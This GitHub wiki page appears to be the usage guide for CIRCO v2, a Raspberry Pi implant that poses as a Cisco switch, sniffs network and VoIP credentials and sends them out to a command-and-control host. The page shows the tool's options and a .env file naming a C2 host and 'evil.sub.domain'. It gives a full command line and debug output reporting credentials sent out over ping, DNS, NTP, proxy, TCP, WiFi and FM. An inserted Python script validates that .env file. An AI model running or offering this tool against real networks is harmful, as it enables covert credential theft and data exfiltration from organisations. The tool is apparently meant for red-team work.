
CIRCO Usage

Emilio edited this page Aug 7, 2020 · 3 revisions

CIRCO v2 Usage


Help

(venv) root@circov2020:/home/pi-enc/v2020# ./circo.py
  ____ ___ ____   ____ ___
 / ___|_ _|  _ \ / ___/ _ \
| |    | || |_) | |  | | | |
| |___ | ||  _ <| |__| |_| |
 \____|___|_| \_\\____\___/


Author: Emilio / @ekio_jp
Version: 2.020

usage: circo.py [-h] [-v] (-i <eth0> | -b) [-A] [-p] [-t] [-d] [-x] [-n] [-f]
                [-w <wlan1>] [--tcp 80] [--spoof] [--voip] [-l <logfile>]

optional arguments:
  -h, --help     show this help message and exit
  -v, --verbose  Enable debugging
  -i <eth0>      Single Mode: <eth0>
  -b, --bridge   Bridge Mode: Use eth0 & eth1
  -A, --ALL      All exfiltration
  -p, --ping     PING exfiltration
  -t, --trace    Traceroute exfiltration
  -d, --dns      DNS exfiltration
  -x, --prx      Proxy exfiltration
  -n, --ntp      NTP exfiltration
  -f, --fm       FM DRS exfiltration
  -w <wlan1>     Wireles exfiltration
  --tcp 80       TCP exfiltration
  --spoof        Spoofing MAC/IP (Proxy Excluded)
  --voip         Collect RTP and SIP credentials
  -l <logfile>   Log File (default <timestamp>.log
(venv) root@circov2020:/home/pi-enc/v2020#

Using -v prints the program flow and also reports when credentials are sent out.

Either -i eth0 (single mode) or -b (bridge mode) is mandatory: single mode needs one LAN NIC connected to the phone or the switch; bridge mode needs two LAN NICs, eth0 connected to the switch and eth1 connected to the phone.

Exfiltration modes are optional; you can combine several of them, or use -A for all of them.

Note that -w wlan1 needs a wireless NIC capable of packet injection. I found the onboard Raspberry Pi wireless unstable, so I opted for a USB wireless dongle (RT3080/RT3070), which works out-of-the-box with Raspbian.

--spoof picks up a MAC/IP from eth1 and uses those for exfiltration.

--voip captures RTP and SIP pcaps into the Captures directory.

-l logs the captured credentials to a file.

The configuration file is called .env and uses the format below (the values shown are sample values; replace the C2 settings CCHOST and CCNAME with your own):

PHRASE='Waaaaa! awesome :)'
SALT='salgruesa'
SEED1=1000
SEED2=5000
SEED3=8000
MAGIC=666
WIFICHAN=10
SWMAC='00:07:B4:00:FA:DE'
INT='FastEthernet0/3'
PHONEMAC='10:8C:CF:75:BB:AA'
SERIAL='FCW1831C1AA'
SNPSU='LIT18300QBB'
SNMPC='public'
CCHOST='200.200.200.300'
CCNAME='evil.sub.domain'
DIRNAME='/home/pi-enc/v2020/'
SSIDROOT='nec-c17c02'
SSIDALARM='pacman'
WIFIMAC='98:f1:99:c1:7c:02'
SNMPTPL='snmpwalk.mib'
TYPE='switch'
FM='87.6'
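As an added example (not CIRCO's own code, and not how circo.py itself loads .env, which this page does not describe), the script below is a stand-alone preflight check for a .env in the format above. It parses the KEY='value' / KEY=123 lines and flags entries that cannot work: missing keys, non-integer seeds, malformed MAC addresses and an unusable CCHOST. The embedded sample is constructed from the values on this page, including the placeholder CCHOST 200.200.200.300, whose last octet exceeds 255 and would never be routable; the set of required keys is an assumption.

```python
#!/usr/bin/env python3
"""Preflight check for a CIRCO-style .env file (added example, not project code)."""
import ipaddress
import re
import sys
from typing import Dict, List

# Constructed sample reproducing the format shown on this page.
SAMPLE_ENV = """\
PHRASE='Waaaaa! awesome :)'
SALT='salgruesa'
SEED1=1000
SEED2=5000
SEED3=8000
MAGIC=666
WIFICHAN=10
SWMAC='00:07:B4:00:FA:DE'
INT='FastEthernet0/3'
PHONEMAC='10:8C:CF:75:BB:AA'
SERIAL='FCW1831C1AA'
SNPSU='LIT18300QBB'
SNMPC='public'
CCHOST='200.200.200.300'
CCNAME='evil.sub.domain'
DIRNAME='/home/pi-enc/v2020/'
SSIDROOT='nec-c17c02'
SSIDALARM='pacman'
WIFIMAC='98:f1:99:c1:7c:02'
SNMPTPL='snmpwalk.mib'
TYPE='switch'
FM='87.6'
"""

# Assumption: these keys must be present for a run to make sense.
REQUIRED = {"PHRASE", "SALT", "SEED1", "SEED2", "SEED3", "MAGIC", "WIFICHAN",
            "SWMAC", "PHONEMAC", "CCHOST", "CCNAME", "DIRNAME", "WIFIMAC",
            "TYPE", "FM"}
INT_KEYS = {"SEED1", "SEED2", "SEED3", "MAGIC", "WIFICHAN"}
MAC_KEYS = {"SWMAC", "PHONEMAC", "WIFIMAC"}
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
LINE_RE = re.compile(r"^([A-Z][A-Z0-9_]*)\s*=\s*(.*?)\s*$")


def parse_env(text: str) -> Dict[str, str]:
    """Parse KEY=value lines, stripping one layer of matching quotes."""
    env: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable line: {raw!r}")
        key, val = m.groups()
        if len(val) >= 2 and val[0] == val[-1] and val[0] in "'\"":
            val = val[1:-1]
        env[key] = val
    return env


def check_env(env: Dict[str, str]) -> List[str]:
    """Return human-readable problems; an empty list means the file passes."""
    problems: List[str] = []
    for key in sorted(REQUIRED - env.keys()):
        problems.append(f"{key}: missing")
    for key in sorted(INT_KEYS & env.keys()):
        if not env[key].lstrip("-").isdigit():
            problems.append(f"{key}: expected integer, got {env[key]!r}")
    for key in sorted(MAC_KEYS & env.keys()):
        if not MAC_RE.match(env[key]):
            problems.append(f"{key}: malformed MAC {env[key]!r}")
    host = env.get("CCHOST")
    if host:
        try:
            ipaddress.IPv4Address(host)  # rejects octets > 255, e.g. ...300
        except ipaddress.AddressValueError:
            problems.append(f"CCHOST: {host!r} is not a valid IPv4 address")
    fm = env.get("FM")
    if fm:
        try:
            float(fm)
        except ValueError:
            problems.append(f"FM: {fm!r} is not a frequency")
    return problems


if __name__ == "__main__":
    # Check a real .env if a path is given, otherwise the embedded sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_ENV
    for p in check_env(parse_env(text)) or ["OK"]:
        print(p)
```

Run it as `./check_env.py /home/pi-enc/v2020/.env` before deploying the Pi; against the sample above it reports only the CCHOST placeholder.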

Running Examples

Using verbose mode (-v), bridge mode (-b), every exfiltration method (including TCP port 80 and wlan1) and logging credentials to creds.txt:

(venv) root@circov2020:/home/pi-enc/v2020# ./circo.py -v -b -p -t -n -d -x -f --tcp 80 -w wlan1 -l creds.txt
  ____ ___ ____   ____ ___
 / ___|_ _|  _ \ / ___/ _ \
| |    | || |_) | |  | | | |
| |___ | ||  _ <| |__| |_| |
 \____|___|_| \_\\____\___/


Author: Emilio / @ekio_jp
Version: 2.020

DEBUG:CDP/LLDP peer discovery
DEBUG:Change MAC to fake switch: 00:07:B4:00:FA:DE
DEBUG:DHCP request started
DEBUG:Configure br0 interface
DEBUG:Collect gateway ARP
DEBUG:Starting Proxy Discovery
DEBUG:Found PAC via DHCP: http://10.10.10.1:88/proxy.pac
DEBUG:Starting Net-Creds Sniffer
DEBUG:SNMP fake template created
DEBUG:Starting CDP as switch
DEBUG:Starting LLDP as switch
DEBUG:Starting IOS Telnet
DEBUG:Starting IOS SSH
DEBUG:Starting IOS SNMP
DEBUG:Starting NMAP OS Fooler
DEBUG:Start WIFI wlan1 monitor mode in channel 10
DEBUG:Starting Exfiltration WIFI
DEBUG:Starting Exfiltration PING
DEBUG:Starting Exfiltracion Traceroute
DEBUG:Starting Exfiltracion TCP 80
DEBUG:Starting Exfiltracion NTP
DEBUG:Starting Exfiltracion DNS
DEBUG:Starting Exfiltracion Proxy DNS
DEBUG:Starting Exfiltracion FM
DEBUG:Sending credentials via PING
DEBUG:Sending credentials via Wifi
DEBUG:Sending credentials via NTP
DEBUG:Sending credentials via DNS
DEBUG:Sending credentials via TRACE
DEBUG:Sending credentials via Proxy DNS
DEBUG:Sending credentials via FM 87.6
DEBUG:Sending credentials via TCP 80